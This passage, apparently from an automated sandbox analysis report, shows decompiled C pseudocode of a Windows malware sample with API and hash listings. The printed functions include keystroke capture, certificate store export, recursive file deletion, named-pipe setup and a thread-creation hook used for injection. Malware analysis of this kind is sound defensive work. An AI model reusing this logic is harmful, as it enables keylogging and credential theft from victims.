        								} while (__eflags < 0);
        								goto L21;
        							}
        							PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
        							_t100 = _v20;
        							_t67 = WaitForSingleObject( *(_t100 + 4), 0x3e8);
        							__eflags = _t67;
        							if(_t67 == 0) {
        								break;
        							}
        							_t98 = _t100;
        							_t97 =  &_v1140;
        							E004048AC( &_v1140, _t100);
        							goto L22;
        						}
        						__eflags = _v574;
        						if(_v574 == 0) {
        							goto L22;
        						}
        						__eflags = _v574 - 0x2e;
        						if(_v574 != 0x2e) {
        							goto L7;
        						}
        						__eflags = _v572;
        						if(_v572 == 0) {
        							goto L22;
        						}
        						goto L7;
        						L23:
        						_t63 = FindNextFileW(_v12,  &_v620);
        						__eflags = _t63;
        					} while (_t63 != 0);
        					L24:
        					FindClose(_v12);
        					return 1;
        				}
        				return 0;
        			}






























        APIs
        • PathCombineW.SHLWAPI(?,?,00401040), ref: 004048CB
        • FindFirstFileW.KERNEL32(?,?,?,00401040), ref: 004048E8
        • PathCombineW.SHLWAPI(?,?,0000002E,?,00401040), ref: 00404947
        • WaitForSingleObject.KERNEL32(?,000003E8,?,00401040), ref: 00404958
        • FindNextFileW.KERNEL32(?,00000010,?,00401040), ref: 00404ACB
        • FindClose.KERNEL32(?,?,00401040), ref: 00404ADC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Find$CombineFilePath$CloseFirstNextObjectSingleWait
        • String ID: .$.$pVirtualKeyExA$ryStringW
        • API String ID: 3352328711-2950257443
        • Opcode ID: cbd02deef1ff97b2d1742cf17d8c404e463d902302e6a5a390249f053469cc14
        • Instruction ID: ce8ce76526c5f289c7fc2b2e7ca56b88422c33298fadce1b66af44ccf44db814
        • Opcode Fuzzy Hash: cbd02deef1ff97b2d1742cf17d8c404e463d902302e6a5a390249f053469cc14
        • Instruction Fuzzy Hash: C35120B1940219EFDF21DFA0DC48AEA77B8FB84304F1180B6A719B31A0D7759A95CF58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040668F(void* __edx, int _a4) {
        				char _v520;
        				short _v524;
        				char _v780;
        				short _v782;
        				short _v784;
        				char _v785;
        				void* __edi;
        				void* __esi;
        				int _t23;
        				intOrPtr _t35;
        				long _t39;
        				intOrPtr _t40;
        				void* _t50;
        				void* _t51;
        				void* _t56;
        				intOrPtr* _t60;
        				intOrPtr _t67;
        
        				_t51 = __edx;
        				_t23 = _a4;
        				if(_t23 == 0) {
        					L15:
        					return _t23;
        				}
        				_t23 =  *(_t23 + 4);
        				if(_t23 != 0x201) {
        					if(_t23 != 0x100) {
        						goto L15;
        					}
        					_t23 = GetKeyState(0x11);
        					if((0x80000000 & _t23) != 0) {
        						goto L15;
        					}
        					_t23 = GetKeyState(0x12);
        					if((0x80000000 & _t23) != 0) {
        						goto L15;
        					}
        					L10:
        					_v782 = 0;
        					_t23 = GetKeyboardState( &_v780);
        					if(_t23 != 0) {
        						_t23 = ToUnicode( *(_a4 + 8), 0,  &_v780,  &_v784, 1, 0);
        						if(_t23 == 1) {
        							_v785 = 0;
        							_t23 = WideCharToMultiByte(0, 0,  &_v784, 1,  &_v785, 1, 0, 0);
        							if(_t23 != 0 && _v785 != 0) {
        								_t23 = E0040642E(_t50, 1,  &_v785);
        							}
        						}
        					}
        					goto L15;
        				}
        				_t67 =  *0x4147c8; // 0x7349
        				if(_t67 == 0) {
        					goto L15;
        				} else {
        					 *0x4147c8 =  *0x4147c8 + 0xffff;
        					_t35 =  *0x414ad4; // 0x241f5a8
        					_t60 = E00408DDB( *((intOrPtr*)(_t35 + 0x70)), 0x1e, 0x1f4);
        					if(_t60 != 0) {
        						_t39 = GetCurrentProcessId();
        						_t40 =  *0x414ad4; // 0x241f5a8
        						wnsprintfW( &_v524, 0x103,  *(_t40 + 0x74), _t56, _t39);
        						E004134BF(_t51, _t60,  &_v520);
        						 *((intOrPtr*)( *_t60 + 8))(_t60, GetTickCount());
        					}
        					goto L10;
        				}
        			}





















        APIs
        • GetTickCount.KERNEL32 ref: 004066FC
        • GetCurrentProcessId.KERNEL32(00000000), ref: 00406703
        • wnsprintfW.SHLWAPI ref: 00406720
        • GetKeyState.USER32(00000011), ref: 0040674B
        • GetKeyState.USER32(00000012), ref: 0040675D
        • GetKeyboardState.USER32(?), ref: 00406774
        • ToUnicode.USER32(?,00000000,?,?,00000001,00000000), ref: 00406794
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 004067B2
          • Part of subcall function 00408DDB: LoadLibraryA.KERNELBASE(?), ref: 00408DF2
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E06
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E1B
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E30
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E45
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E5A
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E6F
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E84
          • Part of subcall function 00408DDB: LoadLibraryA.KERNELBASE(?), ref: 00408EE0
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408EF4
          • Part of subcall function 00408DDB: LoadLibraryA.KERNELBASE(?), ref: 00408F18
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408F2C
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408F40
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408F55
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408F6A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProc$LibraryLoadState$ByteCharCountCurrentKeyboardMultiProcessTickUnicodeWidewnsprintf
        • String ID: ageW$unknown
        • API String ID: 1117135736-3712389677
        • Opcode ID: fcd4f8e1635c732f9d757c27aeb453b66c71ca0fa58c1426051aa109b8b33688
        • Instruction ID: bfaa6e137cb16a25e10779f31c3fe6c7c5f454a8f81471095807dff661065e35
        • Opcode Fuzzy Hash: fcd4f8e1635c732f9d757c27aeb453b66c71ca0fa58c1426051aa109b8b33688
        • Instruction Fuzzy Hash: FE310172100206ABD720EBA4DC88EDB7BECEB84754F02453AF545E7290D634CC688769
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 88%
        			E0040C598(void* __ecx) {
        				short _v548;
        				char _v556;
        				struct _WIN32_FIND_DATAW _v1140;
        				struct _WIN32_FIND_DATAW _v1148;
        				char _v1412;
        				char _v1416;
        				char _v1900;
        				short _v1916;
        				short _v1924;
        				int _t17;
        				intOrPtr _t18;
        				void* _t40;
        				void* _t42;
        				void* _t43;
        				void* _t44;
        				void* _t47;
        				char* _t49;
        
        				_t43 = __ecx;
        				_t17 =  *0x414b58(0,  &_v1900, 0x1a, 0, _t44, _t47, _t40);
        				if(_t17 != 0) {
        					_t18 =  *0x414ad4; // 0x241f5a8
        					PathCombineW( &_v1916,  &_v1916,  *(_t18 + 0x198));
        					_t17 = FindFirstFileW( &_v1924,  &_v1140);
        					_t42 = _t17;
        					_t54 = _t42 - 0xffffffff;
        					if(_t42 != 0xffffffff) {
        						PathRemoveFileSpecW( &_v1924);
        						_t49 = "M<,,>Keolkp90344";
        						do {
        							PathCombineW( &_v548,  &_v1924,  &(_v1140.cFileName));
        							WideCharToMultiByte(0, 0,  &(_v1148.cFileName), 0xffffffff,  &_v1412, 0x103, 0, 0);
        							if(E00408849(_t43, _t54, _t49,  &_v1412, 0) == 0) {
        								E00410093( &_v556);
        								E00408906(_t43, 0, _t49,  &_v1416, 0);
        							}
        						} while (FindNextFileW(_t42,  &_v1148) != 0);
        						_t17 = FindClose(_t42);
        					}
        				}
        				return _t17;
        			}





















        APIs
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,?,-00000002), ref: 0040C5B2
        • PathCombineW.SHLWAPI(?,?,?), ref: 0040C5D1
        • FindFirstFileW.KERNEL32(?,?), ref: 0040C5E4
        • PathRemoveFileSpecW.SHLWAPI(?), ref: 0040C5FA
        • PathCombineW.SHLWAPI(?,?,?), ref: 0040C61A
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000103,00000000,00000000), ref: 0040C63B
        • FindNextFileW.KERNEL32(00000000,?,M<,,>Keolkp90344,?,00000000), ref: 0040C67A
        • FindClose.KERNEL32(00000000), ref: 0040C685
          • Part of subcall function 00410093: SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
          • Part of subcall function 00410093: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Path$Find$Combine$AttributesByteCharCloseDeleteFirstFolderMultiNextRemoveSpecSpecialWide
        • String ID: M<,,>Keolkp90344
        • API String ID: 4081021945-3583232063
        • Opcode ID: b11c95862ccdfd5fdc3a069568385c0943893b3927aa0ff2c89cadaa59407220
        • Instruction ID: 827415808a01aa42485ddb67e6e7ead96fa149ea36097afb80b13c8dfb405185
        • Opcode Fuzzy Hash: b11c95862ccdfd5fdc3a069568385c0943893b3927aa0ff2c89cadaa59407220
        • Instruction Fuzzy Hash: 082151B2404245ABD720DBA1ED8CDEB77ECEBC9710F004A3AB959D2090E7359509CB7A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040B844(WCHAR* __ecx, intOrPtr __edx) {
        				short _v524;
        				short _v532;
        				char _v540;
        				short _v1076;
        				short _v1078;
        				struct _WIN32_FIND_DATAW _v1124;
        				struct _WIN32_FIND_DATAW _v1132;
        				intOrPtr _v1136;
        				intOrPtr _v1140;
        				void* _t29;
        				signed char _t46;
        				void* _t52;
        				WCHAR* _t55;
        
        				_t55 = __ecx;
        				_v1132.ftLastAccessTime = __edx;
        				PathCombineW( &_v524, __ecx, "*");
        				_t29 = FindFirstFileW( &_v532,  &_v1124);
        				_v1132.dwFileAttributes = _v1132.dwFileAttributes & 0x00000000;
        				_t52 = _t29;
        				if(_t52 == 0xffffffff) {
        					L13:
        					return _v1132.dwFileAttributes;
        				} else {
        					goto L1;
        				}
        				L11:
        				if(FindNextFileW(_t52,  &_v1132) != 0) {
        					L1:
        					if(_v1124.cFileName != 0x2e || _v1078 != 0 && (_v1078 != 0x2e || _v1076 != 0)) {
        						_t46 = _v1124.dwFileAttributes >> 0x00000004 & 0x00000001;
        						if(_t46 != 0 || PathMatchSpecW( &(_v1124.cFileName), _v1132.ftCreationTime) != 0) {
        							PathCombineW( &_v532, _t55,  &(_v1124.cFileName));
        							if(_t46 == 0) {
        								if(E00410093( &_v540) != 0) {
        									_v1140 = _v1140 + 1;
        								}
        							} else {
        								_v1140 = _v1140 + E0040B844( &_v540, _v1136);
        							}
        						}
        					}
        					goto L11;
        				} else {
        					FindClose(_t52);
        					goto L13;
        				}
        			}

















        APIs
        • PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040B867
        • FindFirstFileW.KERNEL32(?,?), ref: 0040B87A
        • PathMatchSpecW.SHLWAPI(?,?), ref: 0040B8C5
        • PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040B8DD
        • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040B918
        • FindClose.KERNEL32(00000000), ref: 0040B927
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FindPath$CombineFile$CloseFirstMatchNextSpec
        • String ID: .$.
        • API String ID: 1774936002-3769392785
        • Opcode ID: b956afc0356955967d343f1ebfaf1049d9eae8e1cd98d0a29cf0e167369ee4e2
        • Instruction ID: c3e786bcb6ffdbd1f438587dbf56f233dd10973e367638bbf7211b59f00e0d71
        • Opcode Fuzzy Hash: b956afc0356955967d343f1ebfaf1049d9eae8e1cd98d0a29cf0e167369ee4e2
        • Instruction Fuzzy Hash: 802194725083459BD720EF60D848AAB77FCFBC1314F04893EF68492290E7799949D79E
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 004045BA
        • PFXExportCertStore.CRYPT32(00000000,?,?,00000004), ref: 004045E5
        • PFXExportCertStore.CRYPT32(00000000,?,?,00000004), ref: 0040463D
        • GetSystemTime.KERNEL32(?), ref: 00404650
        • wnsprintfW.SHLWAPI ref: 0040467D
        • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004046C4
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 004046B1
        • CertDeleteCRLFromStore.CRYPT32(00000000), ref: 004046BC
        • CertCloseStore.CRYPT32(00000000,00000000), ref: 004046DB
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Cert$Store$ExportSystem$AllocateCertificateCertificatesCloseContextDeleteDuplicateEnumFromHeapOpenTimewnsprintf
        • String ID:
        • API String ID: 2815783250-0
        • Opcode ID: d90b26ffe156d922ba95be207a60cd5771ababca73f5265f8ad747cf719d2de6
        • Instruction ID: fd37fcfeaa2d01de16add8b94f785360a174619a332df0d8a392818a1b52e0cd
        • Opcode Fuzzy Hash: d90b26ffe156d922ba95be207a60cd5771ababca73f5265f8ad747cf719d2de6
        • Instruction Fuzzy Hash: F931A3B1504305AFC7109F65DC44DAB7BE8EBC9714F008D3AFA55E2290E77AC914CBAA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E00413682(WCHAR* __ecx, intOrPtr __edx, unsigned int _a4) {
        				short _v524;
        				short _v528;
        				short _v532;
        				char _v536;
        				short _v1076;
        				struct _WIN32_FIND_DATAW _v1124;
        				intOrPtr _v1128;
        				void* _v1132;
        				intOrPtr _v1140;
        				int _t37;
        				int _t48;
        				signed short _t56;
        				int _t59;
        				signed int _t72;
        				void* _t82;
        				unsigned int _t87;
        				signed int _t88;
        				void* _t90;
        
        				_t90 = (_t88 & 0xfffffff8) - 0x464;
        				_v1128 = __edx;
        				_v1124.ftCreationTime = __ecx;
        				PathCombineW( &_v524, __ecx, "*");
        				_t37 = FindFirstFileW( &_v532,  &_v1124);
        				_v1132 = _t37;
        				if(_t37 == 0xffffffff) {
        					L12:
        					return _t37;
        				}
        				_t87 = _a4;
        				do {
        					if(E004100B1( &(_v1124.cFileName)) == 0) {
        						_push(_v1124.dwFileAttributes);
        						_t48 = wnsprintfW(_t90 + 0x280 + _t87 * 2, 0x103 - _t87, L"%s\t\tsize:%I64u attr:0x%08X\r\n",  &(_v1124.cFileName), _v1124.nFileSizeLow, _v1124.nFileSizeHigh);
        						_t77 = _t48;
        						_t90 = _t90 + 0x1c;
        						if(_t48 > 0) {
        							if(_t87 > 0) {
        								_t56 = 0x20;
        								_t72 = _t87 >> 1;
        								_t82 =  &_v528;
        								_t59 = memset(_t82, _t56 & 0x0000ffff | (_t56 & 0x0000ffff) << 0x00000010, _t72 << 2);
        								asm("adc ecx, ecx");
        								memset(_t82 + _t72, _t59, 0);
        								_t90 = _t90 + 0x18;
        							}
        							E0040F2F3(_t77 + _t87, _v1132,  &_v528);
        						}
        						if(_t87 < 0xc8 && (_v1124.ftCreationTime & 0x00000010) != 0) {
        							PathCombineW( &_v528, _v1124,  &_v1076);
        							_t28 = _t87 + 1; // 0x1
        							E00413682( &_v536, _v1140, _t28);
        						}
        					}
        				} while (FindNextFileW(_v1132,  &_v1124) != 0);
        				_t37 = FindClose(_v1132);
        				goto L12;
        			}






















        APIs
        • PathCombineW.SHLWAPI(?,?,00401040,?,?,00000000), ref: 004136A7
        • FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 004136BA
        • wnsprintfW.SHLWAPI ref: 00413711
        • PathCombineW.SHLWAPI(?,00000010,?), ref: 00413777
        • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 0041379A
        • FindClose.KERNEL32(?,?,00000000), ref: 004137AC
        Strings
        • %ssize:%I64u attr:0x%08X, xrefs: 00413703
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Find$CombineFilePath$CloseFirstNextwnsprintf
        • String ID: %ssize:%I64u attr:0x%08X
        • API String ID: 3066209975-1641620506
        • Opcode ID: f3acad4001cce5c42a6fae5ae3653cd98d07216831b79fbe0a06b5b2cad4f11f
        • Instruction ID: 9c89af99221d499cee9ec74ede5d7c57bbfe5246a40bddb671b3e6b8ee2927d1
        • Opcode Fuzzy Hash: f3acad4001cce5c42a6fae5ae3653cd98d07216831b79fbe0a06b5b2cad4f11f
        • Instruction Fuzzy Hash: 4831A3B1508305ABC720DF54D888ADBBBE8FBC4314F108A3EF595C22A1E735DA49C799
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00413853() {
        				char _v5;
        				struct _WIN32_FIND_DATAW _v604;
        				short _v1124;
        				void* __esi;
        				void* _t23;
        				void* _t25;
        				intOrPtr _t28;
        				void* _t29;
        				intOrPtr _t30;
        				intOrPtr _t32;
        				int _t35;
        				void* _t44;
        
        				_v5 = 0;
        				E00413832( &_v1124);
        				_t23 = FindFirstFileW( &_v1124,  &_v604);
        				if(_t23 == 0xffffffff) {
        					L5:
        					_t25 = FindFirstFileW(0x4153a8,  &_v604);
        					__eflags = _t25 - 0xffffffff;
        					if(_t25 == 0xffffffff) {
        						L16:
        						return _v5;
        					}
        					FindClose(_t25);
        					__eflags = _v604.nFileSizeLow;
        					if(_v604.nFileSizeLow > 0) {
        						L8:
        						_t28 =  *0x414ad4; // 0x241f5a8
        						_t29 = CreateMutexW(0x4155b4, 0,  *(_t28 + 0x20));
        						__eflags = _t29;
        						if(_t29 == 0) {
        							_t44 = 0;
        							__eflags = 0;
        						} else {
        							_t44 = E00411693(_t29);
        						}
        						_t30 =  *0x414ad4; // 0x241f5a8
        						E0040AA33(__eflags,  *((intOrPtr*)(_t30 + 0x2c)), 8, 0, 0, 0, 0);
        						__eflags = _v604.nFileSizeHigh;
        						if(_v604.nFileSizeHigh <= 0) {
        							__eflags = _v604.nFileSizeLow;
        							if(__eflags > 0) {
        								_t35 = MoveFileExW(0x4153a8,  &_v1124, 3);
        								__eflags = _t35;
        								_t16 =  &_v5;
        								 *_t16 = _t35 != 0;
        								__eflags =  *_t16;
        							}
        						} else {
        							E00410093(0x4153a8);
        						}
        						_t32 =  *0x414ad4; // 0x241f5a8
        						E0040AA33(__eflags,  *((intOrPtr*)(_t32 + 0x2c)), 7, 0, 0, 0, 0);
        						E004116B4(_t44);
        						goto L16;
        					}
        					__eflags = _v604.nFileSizeHigh;
        					if(_v604.nFileSizeHigh <= 0) {
        						goto L16;
        					}
        					goto L8;
        				}
        				FindClose(_t23);
        				if(_v604.nFileSizeLow <= 0 || _v604.nFileSizeHigh != 0) {
        					E00410093( &_v1124);
        					goto L5;
        				} else {
        					return 1;
        				}
        			}
















        APIs
          • Part of subcall function 00413832: lstrcpyW.KERNEL32(00413B91,yNameW), ref: 0041383B
          • Part of subcall function 00413832: lstrcatW.KERNEL32(?,.lll), ref: 0041384A
        • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 0041387E
        • FindClose.KERNEL32(00000000,?,?,?), ref: 0041388A
        • FindFirstFileW.KERNEL32(yNameW,?,?,?,?), ref: 004138C0
        • FindClose.KERNEL32(00000000,?,?,?), ref: 004138D0
        • CreateMutexW.KERNEL32(004155B4,00000000,?,?,?,?), ref: 004138F4
        • MoveFileExW.KERNEL32(yNameW,?,00000003,?,00000008,00000000,00000000,00000000,00000000,?,?,?), ref: 00413940
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Find$File$CloseFirst$CreateMoveMutexlstrcatlstrcpy
        • String ID: yNameW
        • API String ID: 1879962031-1413253154
        • Opcode ID: 07bd54145fe5566cafbee39e8d060eba32512a952d47c92bf35e091e3048867c
        • Instruction ID: 931c6ab978c3d625ae84c42c74c39e2681070810f353003ab9610356990fe827
        • Opcode Fuzzy Hash: 07bd54145fe5566cafbee39e8d060eba32512a952d47c92bf35e091e3048867c
        • Instruction Fuzzy Hash: D73195B1904218AFDB20AFA49C88EEA777CEB4535AF1441B6F204A2150D7788EC5CF2D
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CryptAcquireContextW.ADVAPI32(#A,00000000,00000000,00000001,F0000040,?,0041230D,00000000,?,-0000001C,00000000,?,?,?), ref: 004101E3
        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004101FB
        • CryptHashData.ADVAPI32(?,00000010), ref: 00410216
        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0041022D
        • CryptDestroyHash.ADVAPI32(?), ref: 00410244
        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0041024E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
        • String ID: #A
        • API String ID: 3186506766-1223380006
        • Opcode ID: 00a6c52fb03e762d6cde56b31b48124ae83125e29fb3e6f27cc1ef7cd2f09006
        • Instruction ID: 35969718400f338c5366b7488e5c9e99425ca204b7f732ea1e5b2f1fd4e536e4
        • Opcode Fuzzy Hash: 00a6c52fb03e762d6cde56b31b48124ae83125e29fb3e6f27cc1ef7cd2f09006
        • Instruction Fuzzy Hash: 81113C75A0420CBFEF114F90DC48FEE7B7CEB44344F0080A5B511A11A0D7B5DE949B28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040A8E2(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
        				short _v524;
        				void* __edi;
        				void* _t19;
        				void* _t33;
        				void** _t36;
        
        				_t33 = __ecx;
        				E0040A739( &_v524, _a8);
        				_t36 = RtlAllocateHeap( *0x415fa8, 8, 0x18);
        				if(_t36 != 0) {
        					_t19 = CreateNamedPipeW( &_v524, 3, 6, 0xff, 0x200, 0x200, 0, 0);
        					 *_t36 = _t19;
        					if(_t19 != 0xffffffff) {
        						_t36[1] = CreateEventW(0, 0, 0, 0);
        						_t36[2] = CreateEventW(0, 0, 0, 0);
        						_t36[3] = _a4;
        						_t36[4] = E0040F2C5(_a8);
        						if(E0040B81A(_t33, E0040A75A, _t36) != 0) {
        							WaitForSingleObject(_t36[2], 0xffffffff);
        							return _t36;
        						}
        						CloseHandle( *_t36);
        						CloseHandle(_t36[1]);
        						CloseHandle(_t36[2]);
        						E0040F15E(_t36[4]);
        					}
        					E0040F15E(_t36);
        				}
        				return 0;
        			}









        APIs
          • Part of subcall function 0040A739: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 0040A742
          • Part of subcall function 0040A739: lstrcpyW.KERNEL32(?,?), ref: 0040A750
        • RtlAllocateHeap.NTDLL(00000008,00000018,?), ref: 0040A905
        • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00000200,00000200,00000000,00000000,?,00000001), ref: 0040A933
        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040A94C
        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040A959
          • Part of subcall function 0040B81A: CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040B830
          • Part of subcall function 0040B81A: CloseHandle.KERNEL32(00000000,?,?,0040C445,0040BFC9,00000000,?,00000000), ref: 0040B837
        • CloseHandle.KERNEL32(00000000,0040A75A,00000000,?,00000001), ref: 0040A984
        • CloseHandle.KERNEL32(?,?,00000001), ref: 0040A98D
        • CloseHandle.KERNEL32(?,?,00000001), ref: 0040A996
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • WaitForSingleObject.KERNEL32(?,000000FF,0040A75A,00000000,?,00000001), ref: 0040A9AB
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCreateHandle$EventHeaplstrcpy$AllocateFreeNamedObjectPipeSingleThreadWait
        • String ID:
        • API String ID: 2368775089-0
        • Opcode ID: 6f55b3798b19828938dc2897af5193de2d16021014fcad48b99956fff55a9570
        • Instruction ID: b7952648af3abff7b2ed77cb7fe79ab135b3af259b6d59398858e083c9db8725
        • Opcode Fuzzy Hash: 6f55b3798b19828938dc2897af5193de2d16021014fcad48b99956fff55a9570
        • Instruction Fuzzy Hash: D021B035600300ABCB316F22DC0CE9B7AB8EBC1B10F00C93AF566E26E0D73499158B69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00411DB9(void* __ecx, intOrPtr* __edx, WCHAR* _a4, WCHAR* _a8, signed int _a12) {
        				short _v540;
        				char _v548;
        				short _v1044;
        				short _v1052;
        				char _v1068;
        				struct _WIN32_FIND_DATAW _v1644;
        				signed char _v1660;
        				void* __esi;
        				int _t25;
        				void* _t46;
        				intOrPtr* _t52;
        				void* _t55;
        
        				_t52 = __edx;
        				_t55 = __ecx;
        				_t25 = PathCombineW( &_v1044, _a4, "*");
        				if(_t25 == 0) {
        					L12:
        					return _t25;
        				}
        				_t25 = FindFirstFileW( &_v1052,  &_v1644);
        				_t46 = _t25;
        				if(_t46 == 0xffffffff) {
        					goto L12;
        				} else {
        					goto L2;
        				}
        				do {
        					L2:
        					if(E004100B1( &(_v1644.cFileName)) == 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0 && PathCombineW( &_v540, _a8,  &(_v1644.dwReserved0)) != 0) {
        						if((_v1660 & 0x00000010) == 0) {
        							if(E00411CE0(_t55,  &_v1068,  &_v548) != 0) {
        								 *_t52 =  *_t52 + 1;
        							}
        						} else {
        							if((_a12 & 0x00000001) != 0) {
        								E00411DB9(_t55, _t52,  &_v1068,  &_v548, _a12);
        							}
        						}
        					}
        				} while (FindNextFileW(_t46,  &_v1644) != 0);
        				_t25 = FindClose(_t46);
        				goto L12;
        			}
















        APIs
        • PathCombineW.SHLWAPI(?,00000001,00401040,00000000,00000000,00000000), ref: 00411DDC
        • FindFirstFileW.KERNEL32(?,?), ref: 00411DF7
        • PathCombineW.SHLWAPI(?,00000001,?), ref: 00411E25
        • PathCombineW.SHLWAPI(?,?,?), ref: 00411E3F
        • FindNextFileW.KERNEL32(00000000,?), ref: 00411E95
        • FindClose.KERNEL32(00000000), ref: 00411EA4
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CombineFindPath$File$CloseFirstNext
        • String ID:
        • API String ID: 3830188700-0
        • Opcode ID: 4c3b9b2fc2458e3a01db5007611ae2cfb662d99a9101dc5719992494ed13cedb
        • Instruction ID: 2e1df9b30b25fa82e1198b53c7c9e1d36ee149c73f041ff653760e15d8918ea3
        • Opcode Fuzzy Hash: 4c3b9b2fc2458e3a01db5007611ae2cfb662d99a9101dc5719992494ed13cedb
        • Instruction Fuzzy Hash: 90219172108349ABCB20DFA1DC48EEB77ECAF84344F004A2BBE54C2160EB75D599C75A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00407BE9(CONTEXT* __ebx, void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, void* _a20, struct _EXCEPTION_RECORD _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
        				long _v8;
        				intOrPtr _v16;
        				intOrPtr _v28;
        				void _v32;
        				intOrPtr _v48;
        				void* _v60;
        				void* _t29;
        				int _t33;
        				CONTEXT* _t37;
        				void* _t40;
        
        				_t37 = __ebx;
        				if(NtQueryInformationProcess(_a20, 0,  &_v32, 0x18,  &_v8) != 0 || _v28 == 0) {
        					L13:
        					return NtCreateThread(_a8, _a12, _a16, _a20, _a24, _t37, _a28, _a32);
        				} else {
        					_v8 = 0;
        					if(_v16 == 0) {
        						L11:
        						_t29 = E00407665(_a20);
        						if(_t29 != 0) {
        							 *((intOrPtr*)(_t37 + 0xb0)) = _t29 + _a4;
        						}
        						goto L13;
        					}
        					_t40 = CreateToolhelp32Snapshot(4, 0);
        					if(_t40 == 0) {
        						L10:
        						if(_v8 != 0) {
        							goto L13;
        						}
        						goto L11;
        					}
        					_v60 = 0x1c;
        					_t33 = Thread32First(_t40,  &_v60);
        					while(_t33 != 0) {
        						if(_v48 == _v16) {
        							_v8 = _v8 + 1;
        						}
        						_t33 = Thread32Next(_t40,  &_v60);
        					}
        					CloseHandle(_t40);
        					goto L10;
        				}
        			}














        APIs
        • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00407C00
